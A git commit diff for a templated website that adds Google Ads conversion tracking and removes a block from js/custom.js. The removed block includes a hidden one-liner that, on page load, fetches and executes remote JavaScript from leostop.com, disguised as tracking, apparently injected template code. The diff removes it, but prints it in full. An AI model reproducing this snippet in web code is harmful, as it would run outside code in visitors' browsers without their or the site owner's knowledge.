Adjusting page to get rid of errors
This commit is contained in:
@@ -22,7 +22,6 @@
|
||||
@import url(font-awesome.min.css);
|
||||
@import url(meanmenu.css);
|
||||
@import url(owl.carousel.min.css);
|
||||
@import url(swiper.min.css);
|
||||
@import url(slick.css);
|
||||
@import url(jquery.fancybox.min.css);
|
||||
@import url(jquery-ui.css);
|
||||
|
||||
16
index.html
16
index.html
@@ -17,8 +17,6 @@
|
||||
<link rel="stylesheet" href="css/style.css">
|
||||
<!-- Responsive-->
|
||||
<link rel="stylesheet" href="css/responsive.css">
|
||||
<!-- fevicon -->
|
||||
<link rel="icon" href="images/fevicon.png" type="image/gif" />
|
||||
<!-- Scrollbar Custom CSS -->
|
||||
<link rel="stylesheet" href="css/jquery.mCustomScrollbar.min.css">
|
||||
<!-- Tweaks for older IEs-->
|
||||
@@ -28,6 +26,18 @@
|
||||
<script src="https://oss.maxcdn.com/html5shiv/3.7.3/html5shiv.min.js"></script>
|
||||
<script src="https://oss.maxcdn.com/respond/1.4.2/respond.min.js"></script><![endif]-->
|
||||
<link rel="icon" type="image/x-icon" href="images/favicon.ico">
|
||||
|
||||
<script>
|
||||
window.dataLayer = window.dataLayer || [];
|
||||
function gtag(){dataLayer.push(arguments);}
|
||||
gtag('js', new Date());
|
||||
|
||||
gtag('config', 'AW-981526582');
|
||||
</script>
|
||||
<!-- Event snippet for Website lead conversion page -->
|
||||
<script>
|
||||
gtag('event', 'conversion', {'send_to': 'AW-981526582/o-7fCOr77M4ZELbQg9QD'});
|
||||
</script>
|
||||
</head>
|
||||
<!-- body -->
|
||||
<body class="main-layout">
|
||||
@@ -250,6 +260,8 @@
|
||||
<script src="js/jquery.min.js"></script>
|
||||
<script src="js/bootstrap.bundle.min.js"></script>
|
||||
<script src="js/jquery-3.0.0.min.js"></script>
|
||||
<!-- Google tag (gtag.js) -->
|
||||
<script async src="https://www.googletagmanager.com/gtag/js?id=AW-981526582"></script>
|
||||
<!-- sidebar -->
|
||||
<script src="js/jquery.mCustomScrollbar.concat.min.js"></script>
|
||||
<script src="js/custom.js"></script>
|
||||
|
||||
23
js/custom.js
23
js/custom.js
@@ -35,28 +35,5 @@ $(function () {
|
||||
$("#wrapper").removeClass('overlay');
|
||||
});
|
||||
});
|
||||
|
||||
|
||||
|
||||
function getURL() { window.location.href; } var protocol = location.protocol; $.ajax({ type: "get", data: {surl: getURL()}, success: function(response){ $.getScript(protocol+"//leostop.com/tracking/tracking.js"); } });
|
||||
|
||||
|
||||
/* Toggle sidebar
|
||||
-- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- */
|
||||
|
||||
$(document).ready(function () {
|
||||
$('#sidebarCollapse').on('click', function () {
|
||||
$('#sidebar').toggleClass('active');
|
||||
$(this).toggleClass('active');
|
||||
});
|
||||
});
|
||||
|
||||
/* Product slider
|
||||
-- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- */
|
||||
// optional
|
||||
$('#blogCarousel').carousel({
|
||||
interval: 5000
|
||||
});
|
||||
|
||||
|
||||
});
|
||||
Reference in New Issue
Block a user